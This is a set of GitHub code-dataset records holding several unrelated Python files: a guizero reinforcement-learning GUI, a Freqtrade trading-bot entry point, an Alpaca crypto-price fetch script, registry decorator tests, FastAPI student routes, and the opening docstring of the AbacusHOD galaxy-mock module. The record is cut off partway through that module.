self._environment._env_width = self._env_width\n self._environment._env_height = self._env_height\n self._environment._multiplier = self._multiplier\n self._environment.display_environment(self.sliderBAR.value, self.sliderBR.value, self.sliderKI.value,\n self.sliderHA.value)\n\n def view_env_back_cmd(self):\n self.env_view_box.hide()\n self.menu_box.show()\n\n def view_generation_back_cmd(self):\n self.generation_env_box.hide()\n self.generation_env_box1.hide()\n self.generation_env_box2.hide()\n self.generation_env_button.hide()\n self.menu_box.show()\n\n def generate_cmd(self):\n info(\"Use the Generator\",\n \"- During the environments generation, press key 'S' to save an environment and generate the next.\"\n \"\\n\\n- Press key 'N' to generate a new environment, discarding the previous.\"\n \"\\n\\n- Close PyGame to come back to the menu.\")\n self._environment.generate_environment(self.sliderBAR.value, self.sliderBR.value, self.sliderKI.value,\n self.sliderHA.value)\n self._environment.draw_model()\n self._environment.display_environment(self.sliderBAR.value, self.sliderBR.value, self.sliderKI.value,\n self.sliderHA.value, mode=\"generate\")\n\n def train_cmd(self):\n self.training.load_model(self.listbox2.value, self.render_on.value)\n self.training.run_training(bool(self.render_on.value), bool(self.video_rec_on.value), bool(self.logic_drive_on.value))\n\n def view_train_back_cmd(self):\n self.train_box_view.hide()\n self.menu_box.show()\n\n ###GPU###\n def view_gpus(self):\n try:\n import tensorflow as tf\n gpus = [f\"{tf.config.experimental.get_device_details(gpu).get('device_name', 'unknown')} {gpu.name}\"\n for gpu in tf.config.list_physical_devices('GPU')]\n except Exception: # tensorflow unavailable or GPU query failed\n gpus = []\n self.listbox_gpu = ListBox(self.gpu_view_box, items=gpus, scrollbar=True, width=350, height=350, grid=[0, 1])\n self.menu_box.hide()\n self.gpu_view_box.show()\n\n #########\n ###GPU###\n def view_gpu_back_cmd(self):\n self.gpu_view_box.hide()\n self.menu_box.show()\n #########\n\n\nif __name__ == \"__main__\":\n Guizero(15.0, 15.0, 8.5, 2.5, 1.5)\n", "repo_name": "andrearafanelli/Neural-Logic-Reinforcement-Learning", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 11771, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "utils.simulator.Environment", "line_number": 18, "usage_type": "call"}, {"api_name": "training.training.Training", "line_number": 20, "usage_type": "call"}, {"api_name": "guizero.App", "line_number": 27, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 28, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 29, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 30, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 31, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 32, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 33, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 36, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 38, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 41, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 44, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 45, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 46, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 47, "usage_type": "call"}, {"api_name": 
"guizero.Box", "line_number": 50, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 51, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 52, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 53, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 54, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 56, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 57, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 58, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 59, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 61, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 62, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 63, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 66, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 67, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 68, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 69, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 71, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 73, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 74, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 76, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 77, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 78, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 79, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 80, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 81, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 83, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 85, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 86, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 89, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 90, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 91, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 92, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 94, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 96, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 97, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 100, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 101, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 102, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 103, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 104, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 105, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 107, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 109, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 110, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 112, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 113, "usage_type": "call"}, {"api_name": "guizero.ListBox", "line_number": 115, "usage_type": "call"}, {"api_name": "guizero.CheckBox", 
"line_number": 117, "usage_type": "call"}, {"api_name": "guizero.CheckBox", "line_number": 119, "usage_type": "call"}, {"api_name": "guizero.CheckBox", "line_number": 120, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 121, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 122, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 123, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 124, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "guizero.ListBox", "line_number": 131, "usage_type": "call"}, {"api_name": "guizero.ListBox", "line_number": 132, "usage_type": "call"}, {"api_name": "guizero.info", "line_number": 180, "usage_type": "call"}, {"api_name": "tensorflow.config.experimental.get_device_details", "line_number": 202, "usage_type": "call"}, {"api_name": "tensorflow.config", "line_number": 202, "usage_type": "attribute"}, {"api_name": "tensorflow.config.list_physical_devices", "line_number": 203, "usage_type": "call"}, {"api_name": "tensorflow.config", "line_number": 203, "usage_type": "attribute"}, {"api_name": "guizero.ListBox", "line_number": 206, "usage_type": "call"}]} +{"seq_id": "36278723624", "text": "#!/usr/bin/env python3\n\"\"\"\nMain Freqtrade bot script.\nRead the documentation to know what cli arguments you need.\n\"\"\"\nimport logging\nimport sys\nfrom argparse import Namespace\nfrom typing import List\n\nfrom freqtrade import OperationalException\nfrom freqtrade.arguments import Arguments\nfrom freqtrade.configuration import set_loggers\nfrom freqtrade.worker import Worker\n\n\nlogger = logging.getLogger('freqtrade')\n\n\ndef main(sysargv: List[str]) -> None:\n \"\"\"\n This function will initiate the bot and start the trading loop.\n :return: None\n \"\"\"\n arguments = Arguments(\n sysargv,\n 'Free, open source crypto trading bot'\n )\n args: Namespace = arguments.get_parsed_arg()\n\n # A subcommand has been issued.\n # Means if Backtesting or Hyperopt have been called we exit the bot\n if hasattr(args, 'func'):\n args.func(args)\n return\n\n worker = None\n return_code = 1\n try:\n # Load and run worker\n worker = Worker(args)\n worker.run()\n\n except KeyboardInterrupt:\n logger.info('SIGINT received, aborting ...')\n return_code = 0\n except OperationalException as e:\n logger.error(str(e))\n return_code = 2\n except BaseException:\n logger.exception('Fatal exception!')\n finally:\n if worker:\n worker.exit()\n sys.exit(return_code)\n\n\nif __name__ == '__main__':\n set_loggers()\n main(sys.argv[1:])\n", "repo_name": "prakashrx/freqtrade", "sub_path": "freqtrade/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1434, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "freqtrade.arguments.Arguments", "line_number": 25, "usage_type": "call"}, {"api_name": "argparse.Namespace", "line_number": 29, "usage_type": "name"}, {"api_name": "freqtrade.worker.Worker", "line_number": 41, "usage_type": "call"}, {"api_name": "freqtrade.OperationalException", "line_number": 47, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 55, "usage_type": 
"call"}, {"api_name": "freqtrade.configuration.set_loggers", "line_number": 59, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 60, "usage_type": "attribute"}]} +{"seq_id": "13023544409", "text": "from alpaca.data.requests import CryptoBarsRequest\nfrom alpaca.data.timeframe import TimeFrame\nfrom alpaca.data.historical import CryptoHistoricalDataClient\nimport datetime\n\n# No keys required for crypto data\nclient = CryptoHistoricalDataClient()\n# Creating request object\nrequest_params = CryptoBarsRequest(\n symbol_or_symbols=[\"BTC/USD\"],\n timeframe=TimeFrame.Day,\n start= datetime.datetime(2022, 7, 1), \n end= datetime.datetime(2022, 8, 1)\n )\n\nbtc_bars = client.get_crypto_bars(request_params)\n\n# Convert to dataframe\nbtc_bars.df\n\nprint(btc_bars)", "repo_name": "jayd-lee/Recession-Analysis", "sub_path": "crypto_history.py", "file_name": "crypto_history.py", "file_ext": "py", "file_size_in_byte": 664, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "alpaca.data.historical.CryptoHistoricalDataClient", "line_number": 7, "usage_type": "call"}, {"api_name": "alpaca.data.requests.CryptoBarsRequest", "line_number": 9, "usage_type": "call"}, {"api_name": "alpaca.data.timeframe.TimeFrame.Day", "line_number": 11, "usage_type": "attribute"}, {"api_name": "alpaca.data.timeframe.TimeFrame", "line_number": 11, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "4033096347", "text": "from dataclasses import dataclass\n\nimport pytest\n\nfrom seedwork.application.commands import Command\nfrom seedwork.application.decorators import command_handler, query_handler, registry\nfrom seedwork.application.queries import Query\n\n\n@pytest.mark.unit\ndef test_command_handler_decorator_registers_command_handler():\n registry.clear()\n\n @dataclass\n class FooCommand(Command):\n ...\n\n @command_handler\n def foo_command_handler(command: FooCommand):\n ...\n\n assert registry.get_command_handler_for(FooCommand) == foo_command_handler\n assert registry.get_command_handler_parameters_for(FooCommand) == {}\n\n\n@pytest.mark.unit\ndef test_command_handler_decorator_does_not_register_command_handler_if_type_mismatch():\n registry.clear()\n\n @dataclass\n class FooCommand(Command):\n ...\n\n @dataclass\n class BarCommand(Command):\n ...\n\n @command_handler\n def foo_command_handler(command: BarCommand):\n ...\n\n assert FooCommand not in registry.command_handlers\n\n\n@pytest.mark.unit\ndef test_query_handler_decorator_registers_query_handler():\n registry.clear()\n\n @dataclass\n class FooQuery(Query):\n ...\n\n @query_handler\n def foo_query_handler(query: FooQuery):\n ...\n\n assert registry.get_query_handler_for(FooQuery) == foo_query_handler\n assert registry.get_query_handler_parameters_for(FooQuery) == {}\n", "repo_name": "dangnq2501/python-ddd", "sub_path": "src/seedwork/tests/application/test_decorators.py", "file_name": "test_decorators.py", "file_ext": "py", "file_size_in_byte": 1396, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "41", "api": [{"api_name": "seedwork.application.decorators.registry.clear", "line_number": 12, "usage_type": "call"}, {"api_name": "seedwork.application.decorators.registry", "line_number": 12, "usage_type": "name"}, {"api_name": "seedwork.application.commands.Command", "line_number": 15, 
"usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 14, "usage_type": "name"}, {"api_name": "seedwork.application.decorators.command_handler", "line_number": 18, "usage_type": "name"}, {"api_name": "seedwork.application.decorators.registry.get_command_handler_for", "line_number": 22, "usage_type": "call"}, {"api_name": "seedwork.application.decorators.registry", "line_number": 22, "usage_type": "name"}, {"api_name": "seedwork.application.decorators.registry.get_command_handler_parameters_for", "line_number": 23, "usage_type": "call"}, {"api_name": "seedwork.application.decorators.registry", "line_number": 23, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 10, "usage_type": "attribute"}, {"api_name": "seedwork.application.decorators.registry.clear", "line_number": 28, "usage_type": "call"}, {"api_name": "seedwork.application.decorators.registry", "line_number": 28, "usage_type": "name"}, {"api_name": "seedwork.application.commands.Command", "line_number": 31, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 30, "usage_type": "name"}, {"api_name": "seedwork.application.commands.Command", "line_number": 35, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 34, "usage_type": "name"}, {"api_name": "seedwork.application.decorators.command_handler", "line_number": 38, "usage_type": "name"}, {"api_name": "seedwork.application.decorators.registry.command_handlers", "line_number": 42, "usage_type": "attribute"}, {"api_name": "seedwork.application.decorators.registry", "line_number": 42, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 26, "usage_type": "attribute"}, {"api_name": "seedwork.application.decorators.registry.clear", "line_number": 47, "usage_type": "call"}, {"api_name": "seedwork.application.decorators.registry", "line_number": 47, "usage_type": "name"}, {"api_name": "seedwork.application.queries.Query", "line_number": 50, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 49, "usage_type": "name"}, {"api_name": "seedwork.application.decorators.query_handler", "line_number": 53, "usage_type": "name"}, {"api_name": "seedwork.application.decorators.registry.get_query_handler_for", "line_number": 57, "usage_type": "call"}, {"api_name": "seedwork.application.decorators.registry", "line_number": 57, "usage_type": "name"}, {"api_name": "seedwork.application.decorators.registry.get_query_handler_parameters_for", "line_number": 58, "usage_type": "call"}, {"api_name": "seedwork.application.decorators.registry", "line_number": 58, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 45, "usage_type": "attribute"}]} +{"seq_id": "26559888121", "text": "from fastapi import APIRouter, Depends\n\nfrom core.student_handler import StudentHandler\nfrom schema.student_schema import *\n\nrouter = APIRouter(prefix='/student')\n\n\n@router.get('/info')\ndef create_item():\n result = {'result': 'vicky'}\n return result\n\n\n@router.get('/info/{user_id}')\ndef get_info(common: StudentInfoSchema = Depends(StudentInfoSchema)):\n result = StudentHandler.get_user(user_id=common.user_id)\n return result\n\n\n@router.post('/add-user')\ndef add_info(common: StudentBasicSchema = Depends(StudentBasicSchema)):\n result = StudentHandler.add_user(\n name=common.name,\n gender=common.gender,\n grade=common.grade,\n phone_number=common.phone_number,\n )\n return result\n\n\n@router.delete('delete/{name}')\ndef delete_info(common: StudentSchema = Depends(StudentSchema)):\n 
result = StudentHandler.del_user(name=common.name)\n return result\n\n\n@router.put('update/{id}')\ndef update_info(common: StudentSchema = Depends(StudentSchema)):\n result = StudentHandler.update_info(name=common.name)\n return result\n\n", "repo_name": "pockydog/fastapi", "sub_path": "src/controllers/student_routes.py", "file_name": "student_routes.py", "file_ext": "py", "file_size_in_byte": 1069, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "fastapi.APIRouter", "line_number": 6, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 16, "usage_type": "call"}, {"api_name": "core.student_handler.StudentHandler.get_user", "line_number": 17, "usage_type": "call"}, {"api_name": "core.student_handler.StudentHandler", "line_number": 17, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 22, "usage_type": "call"}, {"api_name": "core.student_handler.StudentHandler.add_user", "line_number": 23, "usage_type": "call"}, {"api_name": "core.student_handler.StudentHandler", "line_number": 23, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 33, "usage_type": "call"}, {"api_name": "core.student_handler.StudentHandler.del_user", "line_number": 34, "usage_type": "call"}, {"api_name": "core.student_handler.StudentHandler", "line_number": 34, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 39, "usage_type": "call"}, {"api_name": "core.student_handler.StudentHandler.update_info", "line_number": 40, "usage_type": "call"}, {"api_name": "core.student_handler.StudentHandler", "line_number": 40, "usage_type": "name"}]} +{"seq_id": "23724975213", "text": "\"\"\"\nThe AbacusHOD module loads halo catalogs from the AbacusSummit \nsimulations and outputs multi-tracer mock galaxy catalogs. \nThe code is highly efficient and contains a large set of HOD\nextensions such as secondary biases (assembly biases),\nvelocity biases, and satellite profile flexibilities. The baseline \nHODs are based on those from `Zheng et al. 2007 `_ \nand `Alam et al. 2020 `_. \nThe HOD extensions are first explained in `Yuan et al. 2018 `_, and more \nrecently summarized in `Yuan et al. 2020b `_ . \nThis HOD code also supports RSD and incompleteness. The code is fast, \ncompleteling a :math:`(2Gpc/h)^3` volume in 80ms per tracer on a 32 core\ndesktop system, and the performance should be scalable. The module also\nprovides efficient correlation function and power spectrum calculators.\nThis module is particularly suited for efficiently sampling HOD parameter\nspace. We provide examples of docking it onto ``emcee`` and ``dynesty``\nsamplers. \n\nThe module defines one class, ``AbacusHOD``, whose constructor \ntakes the path to the simulation volume, and a set of HOD \nparameters, and runs the ``staging`` function to compile the \nsimulation halo catalog as a set of arrays that are saved on\nmemory. The ``run_hod`` function can then be called to \ngenerate galaxy catalogs. \n\nThe output takes the format of a dictionary of dictionaries,\nwhere each subdictionary corresponds to a different tracer. 
\nCurrently, we have enabled tracer types: LRG, ELG, and QSO.\nEach subdictionary contains all the mock galaxies of that \ntracer type, recording their properties with keys ``x``, ``y``\n, ``z``, ``vx``, ``vy``, ``vz``, ``mass``, ``id``, ``Ncent``.\nThe coordinates are in Mpc/h, and the velocities are in km/s.\nThe ``mass`` refers to host halo mass and is in units of Msun/h.\nThe ``id`` refers to halo id, and the ``Ncent`` key refers to number of\ncentral galaxies for that tracer. The first ``Ncent`` galaxies \nin the catalog are always centrals and the rest are satellites. \n\nThe galaxies can be written to disk by setting the \n``write_to_disk`` flag to ``True`` in the argument of \n``run_hod``. However, the I/O is slow and the``write_to_disk`` \nflag defaults to ``False``.\n\nThe core of the AbacusHOD code is a two-pass memory-in-place algorithm.\nThe first pass of the halo+particle subsample computes the number\nof galaxies generated in total. Then an empty array for these galaxies \nis allocated in memory, which is then filled on the second pass of \nthe halos+particles. Each pass is accelerated with numba parallel.\nThe default threading is set to 16. \n\n\nTheory\n======\nThe baseline HOD for LRGs comes from Zheng et al. 2007:\n\n.. math:: \\\\bar{n}_{\\\\mathrm{cent}}(M) = \\\\frac{1}{2}\\\\mathrm{erfc} \\\\left[\\\\frac{\\\\ln(M_{\\\\mathrm{cut}}/M)}{\\\\sqrt{2}\\\\sigma}\\\\right],\n.. math:: \\\\bar{n}_{\\\\textrm{sat}}(M) = \\\\left[\\\\frac{M-\\\\kappa M_{\\\\textrm{cut}}}{M_1}\\\\right]^{\\\\alpha}\\\\bar{n}_{\\\\mathrm{cent}}(M),\n\nThe baseline HOD for ELGs and QSOs \ncomes from Alam et al. 2020. The actual calculation\nis complex and we refer the readers \nto section 3 of `said paper `_ for details. \n\nIn the baseline implementation, the central galaxy is assigned to the center \nof mass of the halo, with the velocity vector also set to that of the center \nof mass of the halo. Satellite galaxies are assigned to particles of the \nhalo with equal weights. When multiple tracers are enabled, each halo/particle\ncan only host a single tracer type. However, we have not yet implemented any\nprescription of conformity. \n\nThe secondary bias (assembly bias) extensions follow the recipes described in \n`Xu et al. 2020 `_ , where the secondary halo\nproperty (concentration or local overdensity) is directly tied to the mass \nparameters in the baseline HOD (:math:`M_{\\\\mathrm{cut}}` and :math:`M_1`):\n\n.. math:: \\\\log_{10} M_{\\\\mathrm{cut}}^{\\\\mathrm{mod}} = \\\\log_{10} M_{\\\\mathrm{cut}} + A_c(c^{\\\\mathrm{rank}} - 0.5) + B_c(\\\\delta^{\\\\mathrm{rank}} - 0.5)\n.. math:: \\\\log_{10} M_{1}^{\\\\mathrm{mod}} = \\\\log_{10} M_{1} + A_s(c^{\\\\mathrm{rank}} - 0.5) + B_s(\\\\delta^{\\\\mathrm{rank}} - 0.5)\n\nwhere :math:`c` and :math:`\\\\delta` represent the halo concentration and local \noverdensity, respectively. These secondary properties are ranked within narrow\nhalo mass bins, and the rank are normalized to range from 0 to 1, as noted by \nthe :math:`\\\\mathrm{rank}` superscript. :math:`(A_c, B_c, A_s, B_s)` form the \nfour parameters describing secondary biases in the HOD model. The default for\nthese parameters are 0. \n\nThe velocity bias extension follows the common prescription as described in \n`Guo et al. 2015 `_ . \n\n.. math:: \\\\sigma_c = \\\\alpha_c \\\\sigma_h\n.. math:: v_s - v_h = \\\\alpha_s (v_p - v_h)\n\nwhere the central velocity bias parameter :math:`\\\\alpha_c` sets the ratio of\ncentral velocity dispersion vs. halo velocity dispersion. 
The satellite \nvelocity bias parameter :math:`\\\\alpha_s` sets the ratio of the satellite\npeculiar velocity to the particle peculiar velocity. The default for these two\nparameters is 1. \n\nWe additionally introduce a set of satellite profile parameters \n:math:`(s, s_v, s_p, s_r)` that allow for flexibilities in how satellite \ngalaxies are distributed within a halo. They respectively allow the galaxy\nweight per particle to depend on radial position (:math:`s`), peculiar velocity\n(:math:`s_v`), perihelion distance of the particle orbit (:math:`s_p`), and\nthe radial velocity (:math:`s_r`). The default values for these parameters are\n0. A detailed description of these parameters is available in \n`Yuan et al. 2018 `_, and more \nrecently in `Yuan et al. 2020b `_ . \n\n\nSome brief examples and technical details about the module\nlayout are presented below, followed by the full module API.\n\n\nShort Example\n=============\n\nThe first step is to create the configuration file such as ``config/abacus_hod.yaml``,\nwhich provides the full customizability of the HOD code. By default, it lives in your \ncurrent work directory under a subdirectory ``./config``. A template with \ndefault settings is provided under ``abacusutils/scripts/config``.\n\nOn first use, you should define which simulation box, which redshift,\nthe path to simulation data, the path to output datasets, the various HOD \nflags and an initial set of HOD parameters. Other decisions that need to be \nmade initially (you can always re-do this but it would take some time) include:\ndo you only want LRGs or do you want other tracers as well? \nDo you want to enable satellite profile flexibilities (the :math:`s, s_v, s_p, s_r`\nparameters)? If so, you need to turn on the ``want_ranks`` flag in the config file. \nIf you want to enable secondary bias based on local environment, what scale \nradius do you want the environment to be defined in? This is set by the \n``density_sigma`` flag in Mpc/h. The default value is 3. Related, the ``Ndim``\nparameter sets the grid size used to compute local density, and it should be set\nto be larger than Lbox/sigma_density. \n\nNow you need to run the ``prepare_sim`` script, which extracts the simulation outputs\nand organizes them into formats that are suited for the HOD code. This code can take \napproximately an hour depending on your configuration settings and system capabilities. \nWe recommend setting the ``Nthread_load`` parameter to ``min(sys_core_count, memoryGB_divided_by_30)``.\nYou can run ``prepare_sim`` on the command line with ::\n python -m abacusnbody.hod.prepare_sim --path2config PATH2CONFIG\n\nWithin Python, you can run the same script with ::\n from abacusnbody.hod import prepare_sim\n \n prepare_sim.main('/path/to/config.yaml')\n\nIf your config file lives in the default location, i.e. ``./config``, then you \ncan ignore the ``--path2config`` flag. \nOnce that is finished, you can construct the ``AbacusHOD`` object and run fast \nHOD chains. A code template is given in ``abacusutils/scripts/run_hod.py`` for \nrunning a few example HODs and ``abacusutils/scripts/run_emcee.py`` for integrating \nwith the ``emcee`` sampler. \n\nTo use the given ``run_hod.py`` script to run a custom configuration file, you can\nsimply run the given script in bash ::\n python run_hod.py --path2config PATH2CONFIG\n\nYou can also construct the AbacusHOD object yourself within Python and run HODs from\nthere. 
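\n\nAs a quick sanity check before running long chains, you can also query the\nexpected galaxy number counts and satellite fractions implied by the current\nHOD parameters. A minimal sketch, assuming ``newBall`` is the ``AbacusHOD``\ninstance constructed as in the reference script below::\n\n ngal_dict, fsat_dict = newBall.compute_ngal(newBall.tracers, Nthread = 16)\n print('expected number of LRGs = ', ngal_dict['LRG'])\n print('expected LRG satellite fraction = ', fsat_dict['LRG'])\n\n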
Here we show the scripts within ``run_hod.py`` for reference.::\n import os\n import glob\n import time\n import yaml\n import numpy as np\n import argparse\n\n from abacusnbody.hod.abacus_hod import AbacusHOD\n\n path2config = 'config/abacus_hod.yaml' # path to config file\n\n # load the config file and parse in relevant parameters\n config = yaml.load(open(path2config))\n sim_params = config['sim_params']\n HOD_params = config['HOD_params']\n clustering_params = config['clustering_params']\n\n # additional parameter choices\n want_rsd = HOD_params['want_rsd']\n write_to_disk = HOD_params['write_to_disk']\n\n # create a new AbacusHOD object\n newBall = AbacusHOD(sim_params, HOD_params, clustering_params)\n \n # first hod run, slow due to compiling jit, write to disk\n mock_dict = newBall.run_hod(newBall.tracers, want_rsd, write_to_disk, Nthread = 16)\n\n # run the 10 different HODs for timing\n for i in range(10):\n newBall.tracers['LRG']['alpha'] += 0.01\n print(\"alpha = \",newBall.tracers['LRG']['alpha'])\n start = time.time()\n mock_dict = newBall.run_hod(newBall.tracers, want_rsd, write_to_disk = False, Nthread = 64)\n print(\"Done iteration \", i, \"took time \", time.time() - start)\n\nThe class also provides fast 2PCF calculators. For example to compute the \nredshift-space 2PCF (:math:`\\\\xi(r_p, \\\\pi)`): ::\n\n # load the rp pi binning from the config file\n bin_params = clustering_params['bin_params']\n rpbins = np.logspace(bin_params['logmin'], bin_params['logmax'], bin_params['nbins'])\n pimax = clustering_params['pimax']\n pi_bin_size = clustering_params['pi_bin_size'] # the pi binning is configrured by pi_max and bin size\n\n mock_dict = newBall.run_hod(newBall.tracers, want_rsd, write_to_disk)\n xirppi = newBall.compute_xirppi(mock_dict, rpbins, pimax, pi_bin_size)\n\n\"\"\"\nimport os\nimport glob\nimport time\nimport timeit\nfrom pathlib import Path\n\nimport numpy as np\nimport h5py\nimport asdf\nimport argparse\nimport multiprocessing\nfrom multiprocessing import Pool\nfrom astropy.io import ascii\n\n\nfrom .GRAND_HOD import *\nfrom .tpcf_corrfunc import calc_xirppi_fast, calc_wp_fast\n# TODO B.H.: staging can be shorter and prettier; perhaps asdf for h5 and ecsv?\n\nclass AbacusHOD:\n \"\"\"\n A highly efficient multi-tracer HOD code for the AbacusSummmit simulations.\n \"\"\"\n def __init__(self, sim_params, HOD_params, clustering_params):\n \"\"\"\n Loads simulation. The ``sim_params`` dictionary specifies which simulation\n volume to load. The ``HOD_params`` specifies the HOD parameters and tracer\n configurations. The ``clustering_params`` specifies the summary statistics \n configurations. The ``HOD_params`` and ``clustering_params`` can be set to their\n default values in the ``config/abacus_hod.yaml`` file and changed later. \n The ``sim_params`` cannot be changed once the ``AbacusHOD`` object is created. \n\n Parameters\n ----------\n sim_params: dict\n Dictionary of simulation parameters. Load from ``config/abacus_hod.yaml``. The dictionary should contain the following keys:\n * ``sim_name``: str, name of the simulation volume, e.g. 'AbacusSummit_base_c000_ph006'. \n * ``sim_dir``: str, the directory that the simulation lives in, e.g. '/path/to/AbacusSummit/'. \n * ``output_dir``: str, the diretory to save galaxy to, e.g. '/my/output/galalxies'. \n * ``subsample_dir``: str, where to save halo+particle subsample, e.g. '/my/output/subsamples/'. \n * ``z_mock``: float, which redshift slice, e.g. 0.5. 
\n\n HOD_params: dict \n HOD parameters and tracer configurations. Load from ``config/abacus_hod.yaml``. It contains the following keys:\n * ``tracer_flags``: dict, which tracers is enabled: \n * ``LRG``: bool, default ``True``. \n * ``ELG``: bool, default ``False``. \n * ``QSO``: bool, default ``False``. \n * ``want_ranks``: bool, enable satellite profile flexibilities. If ``False``, satellite profile follows the DM, default ``True``. \n * ``want_rsd``: bool, enable RSD? default ``True``. # want RSD? \n * ``Ndim``: int, grid density for computing local environment, default 1024.\n * ``density_sigma``: float, scale radius in Mpc / h for local density definition, default 3.\n * ``write_to_disk``: bool, output to disk? default ``False``. Setting to ``True`` decreases performance. \n * ``LRG_params``: dict, HOD parameter values for LRGs. Default values are given in config file. \n * ``ELG_params``: dict, HOD parameter values for ELGs. Default values are given in config file. \n * ``QSO_params``: dict, HOD parameter values for QSOs. Default values are given in config file. \n\n clustering_params: dict\n Sumamry statistics configuration parameters. Load from ``config/abacus_hod.yaml``. It contains the following keys:\n * ``clustering_type``: str, which summary statistic to compute. Options: ``wp``, ``xirppi``, default: ``xirppi``.\n * ``bin_params``: dict, transverse scale binning. \n * ``logmin``: float, :math:`\\\\log_{10}r_{\\\\mathrm{min}} in Mpc/h.\n * ``logmax``: float, :math:`\\\\log_{10}r_{\\\\mathrm{max}} in Mpc/h.\n * ``nbins``: int, number of bins.\n * ``pimax``: int, :math:`\\\\pi_{\\\\mathrm{max}}`. \n * ``pi_bin_size``: int, size of bins along of the line of sight. Need to be divisor of ``pimax``.\n\n \"\"\"\n # simulation details\n self.sim_name = sim_params['sim_name']\n self.sim_dir = sim_params['sim_dir']\n self.subsample_dir = 